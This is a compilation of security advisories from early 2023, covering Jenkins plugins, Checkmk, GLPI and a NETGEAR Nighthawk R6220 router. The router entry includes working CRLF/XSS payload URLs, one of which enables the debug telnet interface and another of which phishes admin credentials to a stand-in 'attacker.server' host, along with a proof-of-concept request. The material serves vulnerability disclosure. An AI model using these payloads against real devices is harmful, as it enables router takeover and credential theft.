Jenkins OpenID Plugin 2.4 and earlier does not invalidate the previous session on login.

CVE-2023-24444: Jenkins Security Advisory 2023-01-24

Jenkins JIRA Pipeline Steps Plugin 2.0.165.v8846cf59f3db and earlier transmits the private key in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.

CVE-2023-24440: Jenkins Security Advisory 2023-01-24

Jenkins OpenId Connect Authentication Plugin 2.4 and earlier does not invalidate the previous session on login.

CVE-2023-24424: Jenkins Security Advisory 2023-01-24

Jenkins view-cloner Plugin 1.1 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

CVE-2023-24450: Jenkins Security Advisory 2023-01-24

Jenkins Kubernetes Credentials Provider Plugin 1.208.v128ee9800c04 and earlier does not set the appropriate context for Kubernetes credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Kubernetes credentials they are not entitled to.

CVE-2023-24425: Jenkins Security Advisory 2023-01-24

Missing permission checks in Jenkins Orka by MacStadium Plugin 1.31 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2023-24433: Jenkins Security Advisory 2023-01-24

Jenkins Keycloak Authentication Plugin 2.3.0 and earlier does not invalidate the previous session on login.

CVE-2023-24456: Jenkins Security Advisory 2023-01-24

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection. A malicious unauthenticated attacker can exploit this vulnerability using a specially crafted URL. This affects firmware versions: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1.

**Response Splitting via CRLF****Description**

CRLF (Carriage Return Line Feed) Injection CWE-93: https://cwe.mitre.org/data/definitions/93.html

Response splitting via Carriage Return Line Feed (CRLF) is a vulnerability that exploits the way HTTP headers parse certain characters such as \\rand \\n. Appending these characters to HTTP headers can allow the insertion of payloads into a header which can result in the manipulation of cookies, server information, and status codes.

Type: Unauthenticated Remote attack

Tested on firmware version: V1.1.0.112\_1.0.1, V1.1.0.114\_1.0.1

**Details**

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection.

This issue affects the custom 404 page that is served when a request is issued for a page that does not exist. By leveraging this vulnerability, an unauthenticated remote attacker is able to inject arbitrary HTML and JavaScript code to be executed in a user's browser.

**Impact**

A malicious attacker can exploit this vulnerability using a specially crafted URL. If this URL is opened by an administrator, the attacker can achieve the following:

1.  Perform actions on the administrative portion of the web application Example payload that enables the debug telnet interface: https://192.168.1.1/666%0A%0A%3Cscript%3Edocument.location=%22https://192.168.1.1/setup.cgi?todo=debug%22;%3C/script%3E
    
2.  Obtain the administrator's credentials through phishing Example phishing payload: https://192.168.1.1/123%0A%0A%3Cscript>var name=prompt("Username");var pass=prompt("Password");document.location="http://attacker.server/?user="+name+"?pass="+pass;</script>
    

Note that if another vulnerability is presented in the administrative portal such as a Remote Command Execution (RCE), an attacker can use a specially crafted URL and chain the two vulnerabilities to create a one-click exploit.

**Evidence**

The request consists of a resource that does not exist ("xsstesty") followed by Line-Feed characters (%0A%0A) and the JavaScript payload.

Request

    GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E 
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Cookie: sessionid=sid17289xxx158005xxx1087458037
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    

Note that the HTTP response headers are embedded directly into the 404 page response body and the payload is executed on the victim's browser.

Response Body

    <script>alert('xss');</script> HTTP/1.1 404 Not Found
    Server: 
    Date: Fri, 02 Jan 1970 02:44:27 GMT
    Content-Type: text/html
    P3P: 443
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1;mode=block
    X-Content-Type-Options: nosniff
    Connection: close
    
            <HTML>
            <HEAD><TITLE>404 Not Found</TITLE></HEAD>
            <BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
            <H4>404 Not Found</H4>
    File not found.
    </BODY>
    </HTML>
    

**Remediation**

Sanitize and neutralize all user-supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.

CVE-2022-47052: NETGEAR/CVE-2022-47052 at main · dest-3/NETGEAR

Improper Input Validation of LDAP user IDs in Tribe29 Checkmk allows attackers that can control LDAP user IDs to manipulate files on the server. Checkmk <= 2.1.0p19, Checkmk <= 2.0.0p32, and all versions of Checkmk 1.6.0 (EOL) are affected.

Component

Setup

Title

Improper validation of LDAP user IDs

Date

Jan 11, 2023

Checkmk Edition

Checkmk Raw (CRE)

Checkmk Version

2.1.0p20 2.0.0p33

Level

Trivial Change

Class

Security Fix

Compatibility

Compatible - no manual interaction needed

Prior to this Werk user IDs synced from an LDAP connection were not properly sanitized. The allowed characters for LDAP users user IDs were not restricted in the same way as local user IDs.

As a result, malicious actors **with the ability to change an LDAP user's uid attribute** were able to, within limits, manipulate files on the server. For instance, attackers were able to override files in other users' var/check\_mk/web folder, including the deletion of their stored two-factor credentials (thus disabling 2FA for the affected user). Additionally, attackers could also lock users out of their accounts by creating a 2FA-credentials file in the affected user's web folder.

However, it should be noted that to the best of our knowledge, attackers could not have impersonated other users or taken over their accounts directly.

This issue was discovered during internal review.

**Affected Versions**:

*   2.1.0 previous to this Werk
*   2.0.0 previous to this Werk
*   1.6.0 (EOL)

**Mitigations**:

Disable LDAP user synchronization.

**Indicators of Compromise**:

Inspect the list of users in WATO user management (Setup > Users) for suspicious user IDs from an LDAP connection.

**Vulnerability Management**:

We have rated the issue with a CVSS Score of 6.8 (Medium) with the following CVSS vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H.

We have assigned the CVE CVE-2023-0284

**Changes**:

This Werk adds sanitization to LDAP user IDs. We do not anticipate any negative impact on legitimate user IDs as the now-forbidden user IDs could not have been used in a functional way.

To the list of all Werks

CVE-2023-0284: Improper validation of LDAP user IDs

GLPI is a Free Asset and IT Management Software package. Versions prior to 10.0.6 are subject to Cross-site Scripting via malicious RSS feeds. An Administrator can import a malicious RSS feed that contains Cross Site Scripting (XSS) payloads inside RSS links. Victims who wish to visit an RSS content and click on the link will execute the Javascript. This issue is patched in 10.0.6.

Moderate

trasher published GHSA-x9g4-j85w-cmff

Jan 24, 2023

**Package**

glpi (glpi-project)

**Affected versions**

\>= 10.0.0

**Description**

**Impact**

RSS feeds contents and links are not properly sanitized. Any user that has subscribed to a malicious RSS feed through its personal or through public RSS feeds can be victim of a XSS attack.

**Patches**

Upgrade to 10.0.6

**For more information**

If you have any questions or comments about this advisory, mail us at glpi-security@ow2.org.

**Severity**

**CVSS base metrics**

User interaction

Required

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

**Weaknesses**

**Credits**

Tag

#perl